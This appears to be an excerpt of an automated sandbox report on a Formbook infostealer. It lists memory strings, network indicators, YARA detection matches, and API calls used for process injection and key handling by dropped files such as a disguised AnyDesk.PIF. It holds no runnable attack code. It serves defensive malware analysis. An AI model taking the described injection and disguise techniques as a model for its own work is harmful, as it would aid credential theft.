          Source: explorer.exe, 00000012.00000003.2285406774.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3870998046.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076946708.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1542764819.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBYTL1i.img
          Source: kn.exeString found in binary or memory: https://login.microsoftonline.com/%s/oauth2/authorize
          Source: kn.exe, 00000007.00000002.1429457981.00007FF68552E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000007.00000000.1425526307.00007FF68552E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000000.1434200373.00007FF68552E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000002.1442396876.00007FF68552E000.00000002.00000001.01000000.00000005.sdmp, kn.exe.5.drString found in binary or memory: https://login.microsoftonline.com/%s/oauth2/authorizeJoinStatusStorage::SetDefaultDiscoveryMetadatah
          Source: kn.exeString found in binary or memory: https://login.microsoftonline.com/%s/oauth2/token
          Source: explorer.exe, 00000012.00000002.3879092352.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1558998492.000000000BBB0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com
          Source: explorer.exe, 00000012.00000002.3879092352.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1558998492.000000000BBB0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comer
          Source: AnyDesk.PIF, 0000000A.00000002.1577156534.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1503159656.000000007ECE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
          Source: explorer.exe, 00000012.00000003.2285406774.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3870998046.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076946708.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1542764819.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://upload.wikimedia.org/wikipedia/commons/thumb/8/84/Zealandia-Continent_map_en.svg/1870px-Zeal
          Source: explorer.exe, 00000012.00000003.2285406774.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3870998046.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076946708.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1542764819.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
          Source: explorer.exe, 00000012.00000003.2285406774.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3870998046.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076946708.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1542764819.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
          Source: explorer.exe, 00000012.00000003.3077399807.000000000BDF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3879092352.000000000BDF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1558998492.000000000BDF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2285822156.000000000BDF5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/EM0
          Source: explorer.exe, 00000012.00000002.3879092352.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1558998492.000000000BBB0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com48
          Source: explorer.exe, 00000012.00000003.2285406774.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3870998046.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076946708.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1542764819.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-b
          Source: explorer.exe, 00000012.00000003.2285406774.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3870998046.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076946708.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1542764819.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/markets/costco-is-seeing-a-gold-rush-what-s-behind-the-demand-for-it
          Source: explorer.exe, 00000012.00000003.2285406774.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3870998046.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076946708.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1542764819.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/the-big-3-mistakes-financial-advisors-say-that-the-1
          Source: explorer.exe, 00000012.00000003.2285406774.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3870998046.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076946708.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1542764819.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/the-no-1-phrase-people-who-are-good-at-small-talk-al
          Source: explorer.exe, 00000012.00000003.2285406774.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3870998046.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076946708.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1542764819.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/kinzinger-has-theory-about-who-next-house-speaker-will-be/vi
          Source: explorer.exe, 00000012.00000003.2285406774.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3870998046.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076946708.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1542764819.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the
          Source: explorer.exe, 00000012.00000003.2285406774.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3870998046.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076946708.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1542764819.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/sports/other/predicting-what-the-pac-12-would-look-like-after-expansion-wi
          Source: explorer.exe, 00000012.00000003.2285406774.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3870998046.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076946708.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1542764819.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/sports/other/simone-biles-leads-u-s-women-s-team-to-seventh-straight-world
          Source: explorer.exe, 00000012.00000003.2285406774.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3870998046.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076946708.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1542764819.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/sports/other/washington-state-ad-asks-ncaa-for-compassion-and-understandin
          Source: explorer.exe, 00000012.00000003.2285406774.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3870998046.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076946708.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1542764819.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/accuweather-el-ni
          Source: explorer.exe, 00000012.00000003.2285406774.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3870998046.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076946708.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1542764819.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/first-map-of-earth-s-lost-continent-has-been-published/
          Source: explorer.exe, 00000012.00000003.2285406774.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3870998046.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076946708.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1542764819.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/stop-planting-new-forests-scientists-say/ar-AA1hFI09
          Source: explorer.exe, 00000012.00000003.2285406774.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3870998046.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076946708.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1542764819.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-winter-forecast-for-the-2023-2024-season/ar-AA1hGINt
          Source: explorer.exe, 00000012.00000003.2285406774.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3870998046.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076946708.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1542764819.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
          Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
          Source: unknownHTTPS traffic detected: 185.102.77.43:443 -> 192.168.2.8:49706 version: TLS 1.2

          E-Banking Fraud

Source: Yara match | File source: 17.2.SndVol.exe.4990000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.AnyDesk.PIF.21e40000.7.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.AnyDesk.PIF.21e40000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 17.2.SndVol.exe.4990000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000011.00000002.1625529389.0000000004990000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.1554023266.0000000021B34000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.1653022588.00000000346B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000014.00000002.3863432255.0000000000E80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.1653057564.00000000346E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.1556634906.0000000021DE1000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000014.00000002.3864799596.0000000004BC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000014.00000002.3864480544.00000000032E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.1556875189.0000000021E40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF68546B684 CertCompareCertificateName,#357,#357,CertEnumCertificatesInStore,CertCompareCertificateName,CertComparePublicKeyInfo,memcmp,#357,CertEnumCertificatesInStore,#357,CertFreeCertificateContext,CertAddCertificateContextToStore,GetLastError,7_2_00007FF68546B684
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF6854725E8 #357,#357,#357,CryptImportKey,GetLastError,#358,#357,CryptSetKeyParam,LocalFree,GetLastError,#357,#357,#357,CertFreeCertificateContext,CryptDestroyKey,7_2_00007FF6854725E8
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF6854EA740 CryptAcquireContextW,GetLastError,#357,CryptImportKey,GetLastError,CryptDestroyKey,CryptGetUserKey,GetLastError,#358,CryptGetUserKey,GetLastError,CryptDestroyKey,#357,CryptDestroyKey,CryptReleaseContext,7_2_00007FF6854EA740
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF6854AE1F8 CertSaveStore,GetLastError,LocalAlloc,#357,CertSaveStore,GetLastError,#357,LocalFree,#357,#357,NCryptOpenStorageProvider,NCryptImportKey,NCryptSetProperty,NCryptFinalizeKey,LocalFree,LocalFree,NCryptFreeObject,7_2_00007FF6854AE1F8
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF6854E6EA8 NCryptImportKey,#360,7_2_00007FF6854E6EA8
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF6854B0EF4 NCryptImportKey,#205,#359,#359,#357,7_2_00007FF6854B0EF4
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF6854A0F58 CertAddEncodedCertificateToStore,GetLastError,#357,UuidCreate,StringFromCLSID,CryptAcquireContextW,GetLastError,CryptImportKey,GetLastError,CertSetCTLContextProperty,GetLastError,CryptDestroyKey,CryptReleaseContext,CoTaskMemFree,CertFreeCertificateContext,7_2_00007FF6854A0F58
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF68549EA7C #357,#357,LocalAlloc,CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,CryptImportKey,GetLastError,CryptSetKeyParam,GetLastError,CryptSetKeyParam,GetLastError,CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,CryptSetKeyParam,GetLastError,#357,LocalFree,LocalFree,LocalFree,CryptDestroyHash,CryptDestroyHash,7_2_00007FF68549EA7C
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF6854729A0 #357,#357,GetLastError,#357,CryptAcquireContextW,GetLastError,CryptGetUserKey,GetLastError,CryptGetUserKey,GetLastError,#357,CryptImportKey,GetLastError,CertFreeCertificateContext,CryptReleaseContext,LocalFree,LocalFree,CryptDestroyKey,7_2_00007FF6854729A0
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF6854E98B0 #357,CryptImportPublicKeyInfo,GetLastError,#357,CryptGenKey,GetLastError,CryptGenRandom,GetLastError,#357,CryptDestroyKey,CryptGetUserKey,GetLastError,CryptImportKey,GetLastError,#357,memcmp,#357,CryptDestroyKey,CryptDestroyKey,CryptDestroyKey,LocalFree,LocalFree,LocalFree,CryptReleaseContext,7_2_00007FF6854E98B0
Source: C:\Users\Public\kn.exe | Code function: 7_2_00007FF6854A184C CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,memset,CryptGetUserKey,GetLastError,CryptGetUserKey,GetLastError,#357,CryptImportKey,GetLastError,CryptDecrypt,GetLastError,GetLastError,#357,CryptDestroyKey,CryptDestroyHash,LocalFree,CryptDestroyKey,GetLastError,#357,LocalFree,7_2_00007FF6854A184C
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854E93A0 CryptGetUserKey,GetLastError,#357,CryptAcquireContextW,GetLastError,CryptImportKey,GetLastError,LocalFree,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,7_2_00007FF6854E93A0
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854B342C CryptImportKey,#205,GetLastError,#357,#357,#357,SetLastError,7_2_00007FF6854B342C
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68543F9B8 strcmp,#357,#359,NCryptOpenStorageProvider,#357,NCryptImportKey,#357,NCryptSetProperty,NCryptFinalizeKey,NCryptFreeObject,NCryptFreeObject,#359,CryptImportPKCS8,GetLastError,#357,CryptGetUserKey,GetLastError,#357,CryptGetUserKey,GetLastError,CryptDestroyKey,CryptReleaseContext,LocalFree,7_2_00007FF68543F9B8
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68544FC20 #359,#357,NCryptOpenStorageProvider,#357,NCryptImportKey,GetLastError,#357,#357,LocalFree,LocalFree,NCryptFreeObject,#357,NCryptFreeObject,#357,7_2_00007FF68544FC20

          System Summary

          Source: 17.2.SndVol.exe.4990000.0.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_Formbook_1112e116; Author: unknown
          Source: 17.2.SndVol.exe.4990000.0.unpack, type: UNPACKEDPE; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 17.2.SndVol.exe.4990000.0.unpack, type: UNPACKEDPE; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
          Source: 10.2.AnyDesk.PIF.21e40000.7.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_Formbook_1112e116; Author: unknown
          Source: 10.2.AnyDesk.PIF.21e40000.7.unpack, type: UNPACKEDPE; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 10.2.AnyDesk.PIF.21e40000.7.unpack, type: UNPACKEDPE; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
          Source: 10.2.AnyDesk.PIF.21e40000.7.raw.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_Formbook_1112e116; Author: unknown
          Source: 10.2.AnyDesk.PIF.21e40000.7.raw.unpack, type: UNPACKEDPE; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 10.2.AnyDesk.PIF.21e40000.7.raw.unpack, type: UNPACKEDPE; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
          Source: 17.2.SndVol.exe.4990000.0.raw.unpack, type: UNPACKEDPE; Matched rule: Windows_Trojan_Formbook_1112e116; Author: unknown
          Source: 17.2.SndVol.exe.4990000.0.raw.unpack, type: UNPACKEDPE; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 17.2.SndVol.exe.4990000.0.raw.unpack, type: UNPACKEDPE; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
          Source: 00000011.00000002.1625529389.0000000004990000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116; Author: unknown
          Source: 00000011.00000002.1625529389.0000000004990000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000011.00000002.1625529389.0000000004990000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.1554023266.0000000021B34000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116; Author: unknown
          Source: 0000000A.00000002.1554023266.0000000021B34000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.1554023266.0000000021B34000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
          Source: 00000011.00000002.1653022588.00000000346B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116; Author: unknown
          Source: 00000011.00000002.1653022588.00000000346B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000011.00000002.1653022588.00000000346B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
          Source: 00000014.00000002.3863432255.0000000000E80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116; Author: unknown
          Source: 00000014.00000002.3863432255.0000000000E80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000014.00000002.3863432255.0000000000E80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
          Source: 00000011.00000002.1653057564.00000000346E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116; Author: unknown
          Source: 00000011.00000002.1653057564.00000000346E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000011.00000002.1653057564.00000000346E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.1556634906.0000000021DE1000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116; Author: unknown
          Source: 0000000A.00000002.1556634906.0000000021DE1000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.1556634906.0000000021DE1000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
          Source: 00000014.00000002.3864799596.0000000004BC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116; Author: unknown
          Source: 00000014.00000002.3864799596.0000000004BC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000014.00000002.3864799596.0000000004BC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
          Source: 00000014.00000002.3864480544.00000000032E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116; Author: unknown
          Source: 00000014.00000002.3864480544.00000000032E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000014.00000002.3864480544.00000000032E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.1556875189.0000000021E40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY; Matched rule: Windows_Trojan_Formbook_1112e116; Author: unknown
          Source: 0000000A.00000002.1556875189.0000000021E40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.1556875189.0000000021E40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
          Source: Process Memory Space: AnyDesk.PIF PID: 8064, type: MEMORYSTR; Matched rule: Windows_Trojan_Formbook_1112e116; Author: unknown
          Source: Process Memory Space: SndVol.exe PID: 7528, type: MEMORYSTR; Matched rule: Windows_Trojan_Formbook_1112e116; Author: unknown
          Source: Process Memory Space: msdt.exe PID: 4040, type: MEMORYSTR; Matched rule: Windows_Trojan_Formbook_1112e116; Author: unknown
          Source: C:\Users\Public\alpha.exe; Code function: 4_2_00007FF6E943898C NtQueryInformationToken
          Source: C:\Users\Public\alpha.exe; Code function: 4_2_00007FF6E9423D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess
          Source: C:\Users\Public\alpha.exe; Code function: 4_2_00007FF6E9451538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW
          Source: C:\Users\Public\alpha.exe; Code function: 4_2_00007FF6E94389E4 NtQueryInformationToken,NtQueryInformationToken
          Source: C:\Users\Public\alpha.exe; Code function: 4_2_00007FF6E9438114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx
          Source: C:\Users\Public\alpha.exe; Code function: 4_2_00007FF6E94388C0 NtOpenThreadToken,NtOpenProcessToken,NtClose
          Source: C:\Users\Public\alpha.exe; Code function: 4_2_00007FF6E944BCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer
          Source: C:\Users\Public\alpha.exe; Code function: 4_2_00007FF6E9437FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError
          Source: C:\Users\Public\alpha.exe; Code function: 6_2_00007FF6E943898C NtQueryInformationToken
          Source: C:\Users\Public\alpha.exe; Code function: 6_2_00007FF6E9423D94 _setjmp,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess
          Source: C:\Users\Public\alpha.exe; Code function: 6_2_00007FF6E9451538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW
          Source: C:\Users\Public\alpha.exe; Code function: 6_2_00007FF6E94389E4 NtQueryInformationToken,NtQueryInformationToken
          Source: C:\Users\Public\alpha.exe; Code function: 6_2_00007FF6E9438114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx
          Source: C:\Users\Public\alpha.exe; Code function: 6_2_00007FF6E94388C0 NtOpenThreadToken,NtOpenProcessToken,NtClose
          Source: C:\Users\Public\alpha.exe; Code function: 6_2_00007FF6E944BCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer
          Source: C:\Users\Public\alpha.exe; Code function: 6_2_00007FF6E9437FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError
          Source: C:\Users\Public\kn.exe; Code function: 7_2_00007FF68550C964 NtQuerySystemTime,RtlTimeToSecondsSince1970
          Source: C:\Users\Public\Libraries\AnyDesk.PIF; Code function: 10_2_02D5B118 GetModuleHandleW,NtOpenProcess,IsBadReadPtr,IsBadReadPtr,GetModuleHandleW,NtCreateThreadEx
          Source: C:\Users\Public\Libraries\AnyDesk.PIF; Code function: 10_2_02D57A2C NtAllocateVirtualMemory
          Source: C:\Users\Public\Libraries\AnyDesk.PIF; Code function: 10_2_02D5DC8C RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose
          Source: C:\Users\Public\Libraries\AnyDesk.PIF; Code function: 10_2_02D5DC04 RtlI,RtlDosPathNameToNtPathName_U,NtDeleteFile
          Source: C:\Users\Public\Libraries\AnyDesk.PIF; Code function: 10_2_02D5DD70 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose
          Source: C:\Users\Public\Libraries\AnyDesk.PIF; Code function: 10_2_02D57D78 NtWriteVirtualMemory
          Source: C:\Users\Public\Libraries\AnyDesk.PIF; Code function: 10_2_02D57A2A NtAllocateVirtualMemory
